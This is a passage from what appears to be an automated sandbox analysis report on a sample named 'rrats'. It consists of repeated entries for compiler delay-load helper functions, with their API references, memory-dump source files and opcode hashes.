                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
                                                              • Instruction ID: 1f3e72252a68b9ef126da08d7f7c90eb7ec25693f6ea6828aa50cd0d0a0b5213
                                                              • Opcode Fuzzy Hash: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
                                                              • Instruction Fuzzy Hash: 05B092A1258241AC2544520A2802DBA014DC084F10730C13AB809C02C1E840AC446432
                                                              Function 00CBE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                              • Instruction ID: 54954f5e521f3fd650e58e2a499e97227397e0f9d3614c87a177ad85bd605138
                                                              • Opcode Fuzzy Hash: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                              • Instruction Fuzzy Hash: A0B012F125D101BC3504510E2C02DFB014DC0C5F10730C03FFC09C02C1E840ED006472
                                                              Function 00CBE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 7289e9bad340b3eb004c2ce48671a6b97ee818788a3ae445e4068d1713e5880a
                                                              • Instruction ID: 96b8672a44ea0195f5d488eec386b830ba78295d5690a10094bf0eabd5253672
                                                              • Opcode Fuzzy Hash: 7289e9bad340b3eb004c2ce48671a6b97ee818788a3ae445e4068d1713e5880a
                                                              • Instruction Fuzzy Hash: 7DB012F125C201BC3544510E2C02DFB014DC0C4F10730C13FF809C02C1E841AD406432
                                                              Function 00CBE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a6029460613fc59a7bb5410daa6b786540218ec40bf48775ff8587ad732371cc
                                                              • Instruction ID: d0da4a94ed9585ad5e155c879b727526d44408580f9e74b1abbc6075d14e166e
                                                              • Opcode Fuzzy Hash: a6029460613fc59a7bb5410daa6b786540218ec40bf48775ff8587ad732371cc
                                                              • Instruction Fuzzy Hash: F0B012F125C101AC3504510F2C02DFB014DC0C8F10730C03FF909C02C1E840AD006432
                                                              Function 00CBE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0092d3bf3a923c2289acc96a2abb10ae370aade00933bbbce28ecdc3e6d636bb
                                                              • Instruction ID: 6263cb9c6bc4e36f9fb4e414a75b651aecde06ec2309e417aefc6f57bd8cb8d4
                                                              • Opcode Fuzzy Hash: 0092d3bf3a923c2289acc96a2abb10ae370aade00933bbbce28ecdc3e6d636bb
                                                              • Instruction Fuzzy Hash: 68B012F125C101AC3504510F2D02EFB014DC0C4F10730C03FF809C02C1EC41AE016432
                                                              Function 00CBE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: eaf848348dfc2137704a54981eaa4c1d1dae78f97c7249cc783190bed5ca99d6
                                                              • Instruction ID: a90432b13c7424c93c5682f52a0ff4b028aa7b5c51730e6ac29d16b12f26e2ee
                                                              • Opcode Fuzzy Hash: eaf848348dfc2137704a54981eaa4c1d1dae78f97c7249cc783190bed5ca99d6
                                                              • Instruction Fuzzy Hash: 91B012E1259201BC364492091C42DF7028DC0C0F10730C03FF908C12C0D8408C056473
                                                              Function 00CBE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ec3eb3d5fac9df20f233ebaf353321e0e95e9c532313468e3932611c85f2a5c5
                                                              • Instruction ID: 1aebba32b57e35b42c4a617d7aa5af8bb5b5a3ed7e08cbd9419f3c4ffbb616c6
                                                              • Opcode Fuzzy Hash: ec3eb3d5fac9df20f233ebaf353321e0e95e9c532313468e3932611c85f2a5c5
                                                              • Instruction Fuzzy Hash: D9B012E12591017C3644520A1D42DF7028DC0C0F10730C03FF608C12C0D8414C4A6473
                                                              Function 00CBE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 260570ea401da8495cdfe103201bb1e6ccd90a4bf4b01532cd27ada055890e16
                                                              • Instruction ID: 1a08cfd9f41bc63f900238d380bb0c75f6eb00dbb67a9abd348dd2b01f11b1f7
                                                              • Opcode Fuzzy Hash: 260570ea401da8495cdfe103201bb1e6ccd90a4bf4b01532cd27ada055890e16
                                                              • Instruction Fuzzy Hash: 93B012F125A001BC364492095C42DF7028DC0C0F10730803FF808C12C0D8408E016473
                                                              Function 00CBE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 588b419958b7a016f4b1b47bd0985fc90fd5cf6b88b6ac88977bd929dff0b432
                                                              • Instruction ID: 714d708a6f1b474d8ffbee7b70506b231c498eb2700660af27be1e86a23fc8ae
                                                              • Opcode Fuzzy Hash: 588b419958b7a016f4b1b47bd0985fc90fd5cf6b88b6ac88977bd929dff0b432
                                                              • Instruction Fuzzy Hash: 33B012D12581017E3104935A1C42DF7015DC5C8F14730403FF408C12C0E8404C095432
                                                              Function 00CBE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3bc762010cc00b081b6e77f76fca1919d1d9fde1440710bd9877bfdb1b9842d1
                                                              • Instruction ID: fe93523e5ec9f3a4486503a58dc9df15b00809a9666c04d2309ded1813ae8cd3
                                                              • Opcode Fuzzy Hash: 3bc762010cc00b081b6e77f76fca1919d1d9fde1440710bd9877bfdb1b9842d1
                                                              • Instruction Fuzzy Hash: 7DB012D12581017C3104915B5D42DF7417DC4D4F14730423FF408C12C0EC414D065432
                                                              Function 00CBE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 8ef2b9fbb1f824cdf334ecd015111d2c768f5dbec8d56e41de8a58ce387f6dd1
                                                              • Instruction ID: f6c7669dc1415293a4433488169b0e45f67f6fac5ba8c7913c4ae5ede830d6c7
                                                              • Opcode Fuzzy Hash: 8ef2b9fbb1f824cdf334ecd015111d2c768f5dbec8d56e41de8a58ce387f6dd1
                                                              • Instruction Fuzzy Hash: 4FB012D12582017C3144915A5C47DF7017DC4D4F14730423FF408C12C0E8404C455432
                                                              Function 00CBE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 215bb9d9e0bd3cee5e623ae66a816c23f333c558f73a11482b3beb79af7e0d01
                                                              • Instruction ID: 15e4632aa908a9ba996890ab619c19e7d4a5340985249459f171fec555edf6bb
                                                              • Opcode Fuzzy Hash: 215bb9d9e0bd3cee5e623ae66a816c23f333c558f73a11482b3beb79af7e0d01
                                                              • Instruction Fuzzy Hash: 55B012C16D9501BC3204610D5C07DFB014DC0C1F14730833FF508C02C0E8404C495432
                                                              Function 00CBE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f1027a1eb4d5e28a100a5d01c42bd13dc65e1ea3aafe6e46e0ae9c0d9ab4d8e3
                                                              • Instruction ID: fafa3a465d079c30c29d40b6a3d02ebc307569c83f9581d15f177bb59908ca4e
                                                              • Opcode Fuzzy Hash: f1027a1eb4d5e28a100a5d01c42bd13dc65e1ea3aafe6e46e0ae9c0d9ab4d8e3
                                                              • Instruction Fuzzy Hash: BAB012C12D9401BC310421291C06DFB010DC0C1F14B30413FF514C05C1A8804D095432
                                                              Function 00CBE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9278a8a13005ac555b434f3ea9b7a3c27eb6bc01c060830acc4fa82336037de4
                                                              • Instruction ID: 0228ed40fabd33c4f4a8314d532303b2a699ee7af6ff45f610f19da15f12ad78
                                                              • Opcode Fuzzy Hash: 9278a8a13005ac555b434f3ea9b7a3c27eb6bc01c060830acc4fa82336037de4
                                                              • Instruction Fuzzy Hash: 63B012C12D9442BD3104620E1D02DFB054DC0C1F14730813FF608C02C0E8414C065432
                                                              Function 00CBE53C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b74eb7f6e8b16a61f2316c10cc3e6315dacd26c74a3bce4a4b89ece2c24c9a09
                                                              • Instruction ID: 76b5c944bf7224b5abe0ce3103314622401957d7397bc53fe74b86fc8d7b008c
                                                              • Opcode Fuzzy Hash: b74eb7f6e8b16a61f2316c10cc3e6315dacd26c74a3bce4a4b89ece2c24c9a09
                                                              • Instruction Fuzzy Hash: A9B012C16D9401FC3104A10D5C02DFB024DC1C5F14730823FF908C02C0E8408C055432
                                                              Function 00CBE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
